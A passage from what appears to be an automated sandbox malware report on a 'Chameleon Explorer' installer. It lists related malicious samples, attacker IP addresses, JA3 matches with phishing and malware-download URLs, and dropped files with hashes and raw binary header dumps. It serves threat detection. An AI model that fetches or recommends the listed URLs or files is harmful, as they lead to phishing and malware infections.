                                                                                                                                • 195.201.152.90
                                                                                                                                fusojTvBz6.exeGet hashmaliciousRedLineBrowse
                                                                                                                                • 135.181.244.210
                                                                                                                                Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 78.46.254.12
                                                                                                                                PPaSstd3ID.elfGet hashmaliciousMiraiBrowse
                                                                                                                                • 136.243.43.57
                                                                                                                                9uIbDIig3Z.exeGet hashmaliciousDjvu, Fabookie, RedLine, SmokeLoaderBrowse
                                                                                                                                • 144.76.136.153
                                                                                                                                HETZNER-ASDEBCAB7D41E580D50925DE89EC5BEAE1E2FB863B102B51F.exeGet hashmaliciousAgentTesla, Amadey, Glupteba, PrivateLoader, RedLine, SmokeLoaderBrowse
                                                                                                                                • 49.12.226.201
                                                                                                                                mhddos_proxy_linuxGet hashmaliciousUnknownBrowse
                                                                                                                                • 195.201.57.90
                                                                                                                                169f996ae43436b043cd641fdf9a2d8cc3d6ff2526c766cdc2adc98700bdaf08.zipGet hashmaliciousQbotBrowse
                                                                                                                                • 148.251.234.93
                                                                                                                                Discord Nitro Generator 2023.exeGet hashmaliciousRedLineBrowse
                                                                                                                                • 188.34.179.139
                                                                                                                                arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 5.75.153.134
                                                                                                                                iFstY3PucO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                • 144.76.136.153
                                                                                                                                BTUOR96HUZ.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 78.47.225.60
                                                                                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 95.216.161.178
                                                                                                                                DJu8KNxajb.exeGet hashmaliciousDanaBot, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                                                • 144.76.136.153
                                                                                                                                14VRL19jgN.exeGet hashmaliciousDjvu, Fabookie, ManusCrypt, SmokeLoaderBrowse
                                                                                                                                • 144.76.136.153
                                                                                                                                LvQbv42E4M.exeGet hashmaliciousDjvu, Fabookie, SmokeLoaderBrowse
                                                                                                                                • 144.76.136.153
                                                                                                                                file.exeGet hashmaliciousRaccoon Stealer v2, VidarBrowse
                                                                                                                                • 78.47.225.60
                                                                                                                                T2gG3mRkay.exeGet hashmaliciousDjvu, SmokeLoaderBrowse
                                                                                                                                • 144.76.136.153
                                                                                                                                9ePrLc51ne.exeGet hashmaliciousDjvu, Fabookie, ManusCrypt, SmokeLoaderBrowse
                                                                                                                                • 144.76.136.153
                                                                                                                                8uX6sa3YNH.exeGet hashmaliciousGlupteba, Nymaim, Raccoon Stealer v2, RedLine, SmokeLoader, VidarBrowse
                                                                                                                                • 148.251.234.93
                                                                                                                                https://zap1056896-1.plesk11.zap-webspace.com/Get hashmaliciousUnknownBrowse
                                                                                                                                • 195.201.152.90
                                                                                                                                fusojTvBz6.exeGet hashmaliciousRedLineBrowse
                                                                                                                                • 135.181.244.210
                                                                                                                                Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 78.46.254.12
                                                                                                                                PPaSstd3ID.elfGet hashmaliciousMiraiBrowse
                                                                                                                                • 136.243.43.57
                                                                                                                                9uIbDIig3Z.exeGet hashmaliciousDjvu, Fabookie, RedLine, SmokeLoaderBrowse
                                                                                                                                • 144.76.136.153

                                                                                                                                JA3 Fingerprints

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                ce5f3254611a8c095a3d821d44539877New Order.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                host.dllGet hashmaliciousIcedIDBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                SecuriteInfo.com.Win32.TrojanX-gen.27372.25236.exeGet hashmaliciousDanaBot, SmokeLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                SecuriteInfo.com.Win32.TrojanX-gen.15063.17682.exeGet hashmaliciousDanaBot, SmokeLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                iFstY3PucO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                file.exeGet hashmaliciousDanaBot, SmokeLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                Card & Booking Details.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                Quotation Required.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                8075zw3OOd.exeGet hashmaliciousDanaBot, SmokeLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                Reservas Details.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                PO7313 2023-02.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                PO 2110035615 2110035616 - EXP DOCs.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                kv1pwTbE2Q.exeGet hashmaliciousPanda Stealer, Phoenix Stealer, SmokeLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                PAYxM3o0eH.exeGet hashmaliciousDCRat, NjratBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                BxlvWO2ADY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                lp4mPmFPdO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                mstD4W9jcF.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                aRRaCVg5D4.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                • 148.251.234.93
                                                                                                                                37f463bf4616ecd445d4a1937da06e19https://s3.amazonaws.com/appforest_uf/f1676960559509x453238006375200830/sage_encrypted.htmGet hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                Pfizer Request for Quotation P1072023.comGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                New Order.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                #U25b6#Ufe0fListen to vm-2023022283898395938434#U25b6#Ufe0f#Ud83e#Uddfe.htm_Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                Call-Record-2023022283898395938434#U25b6#Ufe0f#Ud83e#Uddfe.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://fuc-seto.box.com/s/7z0124muyzh473t10yzl8o17d06h0nf7Get hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://www.evernote.com/shard/s414/sh/9d29e58c-1c47-132c-28a0-4e9a98b8239f/X9hDLVSam1roeENz0E_Yq0SmrG5wsvaeF3-wz10HmOUw8PBHrNJO012AlQGet hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://www.evernote.com/shard/s414/sh/9d29e58c-1c47-132c-28a0-4e9a98b8239f/X9hDLVSam1roeENz0E_Yq0SmrG5wsvaeF3-wz10HmOUw8PBHrNJO012AlQGet hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://www.bing.com/ck/a?!&&p=6f06ea36b7b841b3JmltdHM9MTY3NjkzNzYwMCZpZ3VpZD0wNmYzMzZjNS01Y2Q5LTY1N2ItMGY3My0yNDdhNWQ0YjY0OGMmaW5zaWQ9NTE2MQ&ptn=3&hsh=3&fclid=06f336c5-5cd9-657b-0f73-247a5d4b648c&u=a1aHR0cHM6Ly9zb3V0aHNpbWNvZWJobC5jb20v#c3VzYW4uY2FtcGJlbGxAc2luYWkub3JnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://l.facebook.com/l.php?u=https%3A%2F%2Fappealcenter-2331.netlify.app%2F&h=AT3Ms2KDIY05Q79l2SYsArydmTLyBT0uln9V1Cs6ZPyHu4p905WxKUKkb_IdzbuXG-ZZHEk6c28hhpvw3ygrzK4P2saF70qyTsqQYwwp9H8aQSmX0BV_ZR_STB77wWkTjVF5wjrYsy77jhQspcgG&__tn__=-UK-R&c%5B0%5D=AT0EBvj_y1hOVZU1FIUdZP5x0wyw0p6yE480nyuOWwoA5lp9dSvixurJskwJGqt1kmj7HOlFvP17Z8GGHLRSXLk1hR84BAUbcVi7HoXVXb5RlyVKWIedmqCq_6bYEhO_Z_fNLax1EyV66K0OzDVnvFUohd3cS9q143pA5WOXT8GHXPAUqwfK91bBfx4DSYjMwFnmifr9wrNdMnzZujy9_TpQoSRjGet hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://westernequitypartners-my.sharepoint.com/:f:/g/personal/sarah_akelapest_com/Ehamj_RGXzxMpinv9tBN1AoBSp2aYdJsbftoRFQjwlyipQ?e=ZFoq0bGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://survey123.arcgis.com/share/876caaaca3df43979b254e29f95c2a3bGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://affiliate.insider.com/?amazonTrackingID=biauto-1053-20&postID=61b8efc8f2a36b1ac9f42d54&site=in&u=http://Motional.houseoflegendsusa.com/Motional/zeb.dawson@motional.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                http://download.tenorshare.net/downloads/4ukey.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                1082300000832.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fs.id%2f1A3MD%23dafelski%40wilburellis.com&c=E,1,jLcuZ-gijAThQ77L0hxFN1l378_T_ePjhO_xD3DlIGfmCeXGOqSIPvUSpfnm3CdjobEcYS5xl4urxMI6OU_tg3opmlOxTX-Z3Hg0ilodq0DDnd99ZcHBisG9eiTy&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                DETALLES DEL PAGO.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://adobes-team.adalo.com/adobeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                philip.chambers.Audiomsg4847.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                234567896543456789098765434567890.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                • 142.250.184.84

                                                                                                                                Dropped Files

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousAZORultBrowse
                                                                                                                                  C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousAZORultBrowse
                                                                                                                                    C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousAZORultBrowse

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):15091304
                                                                                                                                      Entropy (8bit):6.181292047546881
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:aVVZ2l4oeoFVuuaBABjcWvkEPGFta7xEmkLGg79M:aVHoeoFVzvBjbEdGg7u
                                                                                                                                      MD5:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      SHA1:E642D694367CC98A8863D87FEC82E4CF940EB48A
                                                                                                                                      SHA-256:9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
                                                                                                                                      SHA-512:01D13FD9A0DD52BC2E3F17AF7A999682201C99ECF7218BCA254A4944A483FD1DEC2A3E6D59DEF501A024AD760B849787902ECB55BD33D23FA9651C0A7689CD1C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious, Browse
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...f=^X..........#.........,E..............@.....................................p.....@..........@............... .......................`...p...@...B...0..|.......h4................................... ..(....................}..........|....................text............................. ..`.data....d.......f.................@....bss.........p...........................idata...p...`...r...L..............@....didata.|...........................@....edata.............................@..@.tls....x................................rdata..m.... .....................@..@.pdata..|....0.....................@..@.rsrc....B...@...B.................@..@JCLDEBUG.............&..............@..@........................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4644456
                                                                                                                                      Entropy (8bit):6.624930231136082
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:wo4YSsZdldgNivQrYsMSn6A59SQs3g/9ob2SSHmc9WhbDTOTI98uk5myyxsXFXzT:LJSsZdldgNimB59SQshb2SH9kwEzT
                                                                                                                                      MD5:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      SHA1:940F504D835FC254602953495320BB92456177B9
                                                                                                                                      SHA-256:137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
                                                                                                                                      SHA-512:015FFC133AD3A6937222BBC057F68B60ABFE22B900B5E7C4E6CA3EC7DC6B09ABAF54B595F00FA9212F370DA8531AF1AC5FC52B39953E1F685E81C66D1EC61F8A
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious, Browse
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....=^X................../.........(./......./...@...........................c.......G...@......@...................`M.......M..H....M...............F.h4....................................M.....................D.M......PM......................text...(X/......Z/................. ..`.itext..D0...p/..2...^/............. ..`.data...\...../......./.............@....bss....<z....0..........................idata...H....M..J...`0.............@....didata......PM.......0.............@....edata.......`M.......0.............@..@.tls....H....pM..........................rdata..].....M.......0.............@..@.rsrc.........M.......0.............@..@JCLDEBUG.D...@W..F...d:.............@..@........................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):146536
                                                                                                                                      Entropy (8bit):5.3703743168809845
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:uXYKg56JP/jTk576nGaayaa+9oWjxDgUFUFwdTzuZ/AhR:uHPkUckUFUi1um
                                                                                                                                      MD5:246AAA95ABDDFD76F9166A2DAA9F2D73
                                                                                                                                      SHA1:0467FA8567B71F6E3A54D152D9EA77121C627798
                                                                                                                                      SHA-256:3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
                                                                                                                                      SHA-512:FE2042E9CE22BE3E6E6FE1B324290AEDBC155C55C0EDE63CCF44A0EEA10CE9F626C7553C40B24D917E5A4A8FB70513B33D698F7DEF5091A50831FA0529E8E669
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious, Browse
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....=^X.........."..........h................@......................................................@............... ...............@..\.... ..@.......................h4...p...............................`..(....................".......0.......................text...P........................... ..`.data...............................@....bss.....N...............................idata..@.... ......................@....didata......0......................@....edata..\....@......................@..@.tls.........P...........................rdata..m....`......................@..@.reloc.......p......................@..B.pdata..............................@..@.rsrc...............................@..@....................................@..@

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):805400
                                                                                                                                      Entropy (8bit):6.529115621464912
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                                                      MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                                                      SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                                                      SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                                                      SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):805400
                                                                                                                                      Entropy (8bit):6.529115621464912
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                                                      MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                                                      SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                                                      SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                                                      SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):805400
                                                                                                                                      Entropy (8bit):6.529115621464912
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                                                      MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                                                      SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                                                      SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                                                      SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1275416
                                                                                                                                      Entropy (8bit):5.811103517353428
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                                                      MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                                                      SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                                                      SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
                                                                                                                                      SHA-512:515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1275416
                                                                                                                                      Entropy (8bit):5.811103517353428
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                                                      MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                                                      SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                                                      SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
                                                                                                                                      SHA-512:515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1275416
                                                                                                                                      Entropy (8bit):5.811103517353428
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                                                      MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                                                      SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                                                      SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
                                                                                                                                      SHA-512:515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\Folder.dll

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):768032
                                                                                                                                      Entropy (8bit):6.537086415352977
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
                                                                                                                                      MD5:FB76F4F533203E40CE30612A47171F94
                                                                                                                                      SHA1:304BA296C77A93DDB033D52578FCC147397DB981
                                                                                                                                      SHA-256:3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
